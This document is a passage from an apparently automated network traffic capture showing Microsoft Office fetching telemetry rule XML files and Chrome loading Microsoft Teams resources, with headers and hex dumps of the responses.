                                                                                                                                                                                                                                                                            2024-12-03 18:00:08 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            110192.168.2.45006213.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:09 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:09 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                                                            x-ms-request-id: 97ca64ed-201e-000c-5e6e-4379c4000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180009Z-174f7845968zgtf6hC1EWRqd8s0000000z7000000000f2y4
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:09 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            111192.168.2.45006313.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:09 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:09 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                                                                            x-ms-request-id: 910f2ee4-d01e-00a1-4df4-4435b1000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180009Z-174f7845968xr5c2hC1EWRd0hn0000000r7g0000000012fr
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:09 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            112192.168.2.45006413.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:09 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:09 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 405
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                                                                                            x-ms-request-id: 9135d871-d01e-00a1-3102-4535b1000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180009Z-174f78459688l8rvhC1EWRtzr00000000kz0000000001ty2
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:09 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            113192.168.2.45006513.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:09 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:09 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                                                                            x-ms-request-id: bd78242f-a01e-003d-3eee-4498d7000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180009Z-174f7845968swgbqhC1EWRmnb400000016fg000000006vm5
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:09 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            114192.168.2.45006752.123.129.144431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:09 UTC655OUTGET /v2/worker/precompiled-telemetry-web-worker-4be7a4934c71ca93.js HTTP/1.1
                                                                                                                                                                                                                                                                            Host: teams.microsoft.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: worker
                                                                                                                                                                                                                                                                            Referer: https://teams.microsoft.com/v2/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            Cookie: MUIDB=28C464D8E51F67EE36DA7192E47D666E; clocale=en-us
                                                                                                                                                                                                                                                                            2024-12-03 18:00:10 UTC7816INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-transform, must-revalidate, no-cache
                                                                                                                                                                                                                                                                            Content-Length: 5375
                                                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                            Expires: Mon, 02 Dec 2024 18:00:09 GMT
                                                                                                                                                                                                                                                                            strict-transport-security: max-age=2592000
                                                                                                                                                                                                                                                                            x-ring-info: web: general [assigned];
                                                                                                                                                                                                                                                                            content-security-policy: block-all-mixed-content;base-uri 'none';child-src blob: data: https:;connect-src 'self' blob: data: https: http://localhost:4318 *.office.net ws://localhost:* wss://127.0.0.1:9002 wss://view-localhost:* wss://*.svc.ms wss://augloop-dogfood.officeppe.com wss://augloop.office.com wss://augloop.svc.cloud.microsoft wss://augloop-gcc.office.com wss://*.augloop-dogfood.officeppe.com wss://*.augloop.office.com wss://*.augloop-gcc.office.com wss://*.augloop.svc.cloud.microsoft wss://*.pptservicescast.edog.officeapps.live.com wss://*.pptservicescast.officeapps.live.com wss://pptservicescast.edog.officeapps.live.com wss://pptservicescast.gcc.osi.office365.us wss://pptservicescast.officeapps.live.com wss://pptservicescast.osi.office365.us wss://*.attend.teams.microsoft.com wss://*.attend.teams.microsoft.net wss://*.attend.gcc.teams.microsoft.com wss://attend.gcc.teams.microsoft.com wss://*.cts.azure.us wss://*.cts.speech.microsoft.com wss://*.cts.speech-test.microsoft.com wss://*.enterprisevoice [TRUNCATED]
                                                                                                                                                                                                                                                                            content-security-policy-report-only: img-src 'self' blob: data: https://statics.teams.cdn.office.net *.ams.gcc.teams.microsoft.com *.asm.skype.com *.asyncgw.teams.microsoft.com *.giphy.com *.loki.delve.office.com *.office.net *.officeapps.live.com *.sharepoint-df.com *.sharepoint.com bot-framework.azureedge.net connectoricons-prod.azureedge.net content.powerapps.com docs.botframework.com i.vimeocdn.com i.ytimg.com local.teams.office.com:* marketplacecdn.azureedge.net media.licdn.com outlook.office.com pbs.twimg.com raw.githubusercontent.com skypeteamsbotstorage.blob.core.windows.net statics.teams.microsoft.com substrate.office.com teams.microsoft.com urlp.sfbassets.com www.odwebp.svc.ms;frame-src https: mailto: ms-appx-web: ms-excel: ms-powerpoint: ms-visio: ms-whiteboard-preview: ms-word: msteams: onenote: pdf: sip: sips:;script-src 'nonce-X87hpFd5Jb7N6jSqK7zh/g==' 'report-sample' https://statics.teams.cdn.office.net browser.events.data.microsoft.com local.teams.microsoft.invalid c1-powerpoint-15.cdn.office. [TRUNCATED]
                                                                                                                                                                                                                                                                            requestid: aa2e4fb6dd98c2f4fffc6cf36efcbd84
                                                                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                                                                                                            x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                            x-envoy-upstream-service-time: 2
                                                                                                                                                                                                                                                                            x-request-id: 88c33398-a9e6-4965-8ec7-9a5bb1377cc0
                                                                                                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 34CAE1D9E9C6467385CAEDBE03BB8BCD Ref B: EWR30EDGE0214 Ref C: 2024-12-03T18:00:09Z
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:09 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-03 18:00:10 UTC3571INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 61 2c 73 2c 74 2c 72 2c 6e 3d 7b 37 37 30 31 33 34 3a 28 65 2c 61 2c 73 29 3d 3e 7b 76 61 72 20 74 3d 73 28 38 32 38 32 39 34 29 3b 63 6c 61 73 73 20 72 20 65 78 74 65 6e 64 73 20 74 2e 6b 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 61 29 7b 73 75 70 65 72 28 29 2c 74 68 69 73 2e 63 68 61 6e 6e 65 6c 3d 65 2c 74 68 69 73 2e 62 72 6f 61 64 63 61 73 74 43 68 61 6e 6e 65 6c 3d 6e 65 77 20 42 72 6f 61 64 63 61 73 74 43 68 61 6e 6e 65 6c 28 22 54 65 6c 65 6d 65 74 72 79 22 29 2c 74 68 69 73 2e 71 75 65 75 65 64 4d 65 73 73 61 67 65 73 3d 5b 5d 2c 74 68 69 73 2e 62 61 74 63 68 53 69 7a 65 3d 61 3f 3f 31 30 2c 74 68 69 73 2e 62 72 6f 61 64 63 61 73 74 43 68 61 6e 6e 65 6c 2e 6f 6e 6d 65
                                                                                                                                                                                                                                                                            Data Ascii: (()=>{"use strict";var e,a,s,t,r,n={770134:(e,a,s)=>{var t=s(828294);class r extends t.k{constructor(e,a){super(),this.channel=e,this.broadcastChannel=new BroadcastChannel("Telemetry"),this.queuedMessages=[],this.batchSize=a??10,this.broadcastChannel.onme
                                                                                                                                                                                                                                                                            2024-12-03 18:00:10 UTC1804INData Raw: 2e 70 3d 68 29 7d 63 61 74 63 68 28 65 29 7b 6f 28 65 29 7d 7d 2c 70 3d 28 65 2c 73 2c 74 29 3d 3e 63 28 73 2e 67 65 74 2c 72 5b 31 5d 2c 61 2c 30 2c 68 2c 74 29 2c 68 3d 61 3d 3e 7b 72 2e 70 3d 31 2c 6e 5b 65 5d 3d 65 3d 3e 7b 65 2e 65 78 70 6f 72 74 73 3d 61 28 29 7d 7d 3b 63 28 69 2c 72 5b 32 5d 2c 30 2c 30 2c 28 28 65 2c 61 2c 73 29 3d 3e 65 3f 63 28 69 2e 49 2c 72 5b 30 5d 2c 30 2c 65 2c 70 2c 73 29 3a 6f 28 29 29 2c 31 29 7d 7d 29 29 7d 2c 28 28 29 3d 3e 7b 69 2e 53 3d 7b 7d 3b 76 61 72 20 65 3d 7b 7d 2c 61 3d 7b 7d 3b 69 2e 49 3d 28 73 2c 74 29 3d 3e 7b 74 7c 7c 28 74 3d 5b 5d 29 3b 76 61 72 20 72 3d 61 5b 73 5d 3b 69 66 28 72 7c 7c 28 72 3d 61 5b 73 5d 3d 7b 7d 29 2c 21 28 74 2e 69 6e 64 65 78 4f 66 28 72 29 3e 3d 30 29 29 7b 69 66 28 74 2e 70 75
                                                                                                                                                                                                                                                                            Data Ascii: .p=h)}catch(e){o(e)}},p=(e,s,t)=>c(s.get,r[1],a,0,h,t),h=a=>{r.p=1,n[e]=e=>{e.exports=a()}};c(i,r[2],0,0,((e,a,s)=>e?c(i.I,r[0],0,e,p,s):o()),1)}}))},(()=>{i.S={};var e={},a={};i.I=(s,t)=>{t||(t=[]);var r=a[s];if(r||(r=a[s]={}),!(t.indexOf(r)>=0)){if(t.pu


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            115192.168.2.45007352.123.129.144431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:09 UTC604OUTGET /v2/manifest.json HTTP/1.1
                                                                                                                                                                                                                                                                            Host: teams.microsoft.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: manifest
                                                                                                                                                                                                                                                                            Referer: https://teams.microsoft.com/v2/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            Cookie: MUIDB=28C464D8E51F67EE36DA7192E47D666E; clocale=en-us
                                                                                                                                                                                                                                                                            2024-12-03 18:00:10 UTC682INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-transform, must-revalidate, no-cache
                                                                                                                                                                                                                                                                            Content-Length: 495
                                                                                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                            Expires: Mon, 02 Dec 2024 18:00:10 GMT
                                                                                                                                                                                                                                                                            strict-transport-security: max-age=2592000
                                                                                                                                                                                                                                                                            x-ring-info: web: general [assigned];
                                                                                                                                                                                                                                                                            requestid: bbde9c26b0fac486bc09fb71a9da21a7
                                                                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                                                                                                            x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                            x-envoy-upstream-service-time: 2
                                                                                                                                                                                                                                                                            x-request-id: 5cda51c2-0578-4af1-a1e5-8b404c5c8dba
                                                                                                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: A50B3F25FE3E4B349A46AAF23D414CB6 Ref B: EWR30EDGE1615 Ref C: 2024-12-03T18:00:10Z
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:09 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-03 18:00:10 UTC495INData Raw: 7b 0a 20 20 22 6e 61 6d 65 22 3a 20 22 4d 69 63 72 6f 73 6f 66 74 20 54 65 61 6d 73 22 2c 0a 20 20 22 73 68 6f 72 74 5f 6e 61 6d 65 22 3a 20 22 54 65 61 6d 73 22 2c 0a 20 20 22 69 63 6f 6e 73 22 3a 20 5b 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 22 73 72 63 22 3a 20 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 73 2e 74 65 61 6d 73 2e 63 64 6e 2e 6f 66 66 69 63 65 2e 6e 65 74 2f 65 76 65 72 67 72 65 65 6e 2d 61 73 73 65 74 73 2f 69 63 6f 6e 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 74 65 61 6d 73 5f 6c 6f 67 6f 5f 72 65 66 72 65 73 68 2e 69 63 6f 22 2c 0a 20 20 20 20 20 20 22 73 69 7a 65 73 22 3a 20 22 32 35 36 78 32 35 36 22 2c 0a 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 69 6d 61 67 65 2f 70 6e 67 22 0a 20 20 20 20 7d 0a 20 20 5d 2c 0a 20 20 22 69 64 22 3a 20
                                                                                                                                                                                                                                                                            Data Ascii: { "name": "Microsoft Teams", "short_name": "Teams", "icons": [ { "src": "https://statics.teams.cdn.office.net/evergreen-assets/icons/microsoft_teams_logo_refresh.ico", "sizes": "256x256", "type": "image/png" } ], "id":


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            116192.168.2.45007413.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:09 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:10 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 174
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                                                                            x-ms-request-id: bc2c06a1-701e-005c-2dee-44bb94000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180010Z-174f7845968xr5c2hC1EWRd0hn0000000r2g00000000hztg
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
